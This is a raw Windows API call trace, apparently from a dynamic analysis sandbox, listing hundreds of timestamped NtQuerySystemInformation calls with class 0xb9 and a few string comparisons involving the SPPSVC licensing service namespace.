[0299.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed20, Length=0x20, ResultLength=0x0) [0299.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efe0, Length=0x50, ResultLength=0x0) [0299.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef60, Length=0x28, ResultLength=0x0) [0299.592] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0299.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efe0, Length=0x50, ResultLength=0x0) [0299.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efe0, Length=0x50, ResultLength=0x0) [0299.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efe0, Length=0x50, ResultLength=0x0) [0299.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef10, Length=0x38, ResultLength=0x0) [0299.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed40, Length=0x28, ResultLength=0x0) [0299.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed40, Length=0x28, ResultLength=0x0) [0299.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed40, Length=0x28, ResultLength=0x0) [0299.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217edb0, Length=0x28, ResultLength=0x0) [0299.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef10, Length=0x38, ResultLength=0x0) [0299.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x28, ResultLength=0x0) [0299.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x28, ResultLength=0x0) [0299.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef10, Length=0x38, ResultLength=0x0) [0299.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed90, Length=0x20, ResultLength=0x0) [0299.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed10, Length=0x20, ResultLength=0x0) [0299.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed10, Length=0x20, ResultLength=0x0) [0299.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed10, Length=0x20, ResultLength=0x0) [0299.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef10, Length=0x38, ResultLength=0x0) [0299.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed90, Length=0x20, ResultLength=0x0) [0299.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed20, Length=0x20, ResultLength=0x0) [0299.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed20, Length=0x20, ResultLength=0x0) [0299.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f430, Length=0x50, ResultLength=0x0) [0301.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f3b0, Length=0x28, ResultLength=0x0) [0301.218] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0301.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f430, Length=0x50, ResultLength=0x0) [0301.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f430, Length=0x50, ResultLength=0x0) [0301.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f430, Length=0x50, ResultLength=0x0) [0301.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f360, Length=0x38, ResultLength=0x0) [0301.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f190, Length=0x28, ResultLength=0x0) [0301.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f190, Length=0x28, ResultLength=0x0) [0301.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f190, Length=0x28, ResultLength=0x0) [0301.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f200, Length=0x28, ResultLength=0x0) [0301.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f360, Length=0x38, ResultLength=0x0) [0301.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f280, Length=0x28, ResultLength=0x0) [0301.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f280, Length=0x28, ResultLength=0x0) [0301.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f360, Length=0x38, ResultLength=0x0) [0301.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1e0, Length=0x20, ResultLength=0x0) [0301.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f160, Length=0x20, ResultLength=0x0) [0301.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f160, Length=0x20, ResultLength=0x0) [0301.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f160, Length=0x20, ResultLength=0x0) [0301.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f360, Length=0x38, ResultLength=0x0) [0301.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1e0, Length=0x20, ResultLength=0x0) [0301.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f170, Length=0x20, ResultLength=0x0) [0301.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f170, Length=0x20, ResultLength=0x0) [0301.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f430, Length=0x50, ResultLength=0x0) [0301.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f3b0, Length=0x28, ResultLength=0x0) [0301.236] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0301.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f430, Length=0x50, ResultLength=0x0) [0301.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f430, Length=0x50, ResultLength=0x0) [0301.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f430, Length=0x50, ResultLength=0x0) [0301.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f360, Length=0x38, ResultLength=0x0) [0301.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f190, Length=0x28, ResultLength=0x0) [0301.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f190, Length=0x28, ResultLength=0x0) [0301.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f190, Length=0x28, ResultLength=0x0) [0301.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f200, Length=0x28, ResultLength=0x0) [0301.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f360, Length=0x38, ResultLength=0x0) [0301.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f280, Length=0x28, ResultLength=0x0) [0301.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f280, Length=0x28, ResultLength=0x0) [0301.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f360, Length=0x38, ResultLength=0x0) [0301.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1e0, Length=0x20, ResultLength=0x0) [0301.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f160, Length=0x20, ResultLength=0x0) [0301.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f160, Length=0x20, ResultLength=0x0) [0301.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f160, Length=0x20, ResultLength=0x0) [0301.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f360, Length=0x38, ResultLength=0x0) [0301.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1e0, Length=0x20, ResultLength=0x0) [0301.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f170, Length=0x20, ResultLength=0x0) [0301.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f170, Length=0x20, ResultLength=0x0) [0301.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f480, Length=0x58, ResultLength=0x0) [0301.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f3f0, Length=0x28, ResultLength=0x0) [0301.829] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0301.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f480, Length=0x58, ResultLength=0x0) [0301.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f480, Length=0x58, ResultLength=0x0) [0301.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f480, Length=0x58, ResultLength=0x0) [0301.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f360, Length=0x38, ResultLength=0x0) [0301.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1a0, Length=0x28, ResultLength=0x0) [0301.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1a0, Length=0x28, ResultLength=0x0) [0301.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1a0, Length=0x28, ResultLength=0x0) [0301.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f210, Length=0x28, ResultLength=0x0) [0301.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f360, Length=0x38, ResultLength=0x0) [0301.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f360, Length=0x38, ResultLength=0x0) [0301.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f290, Length=0x28, ResultLength=0x0) [0301.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f290, Length=0x28, ResultLength=0x0) [0301.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f360, Length=0x38, ResultLength=0x0) [0301.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f360, Length=0x38, ResultLength=0x0) [0301.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 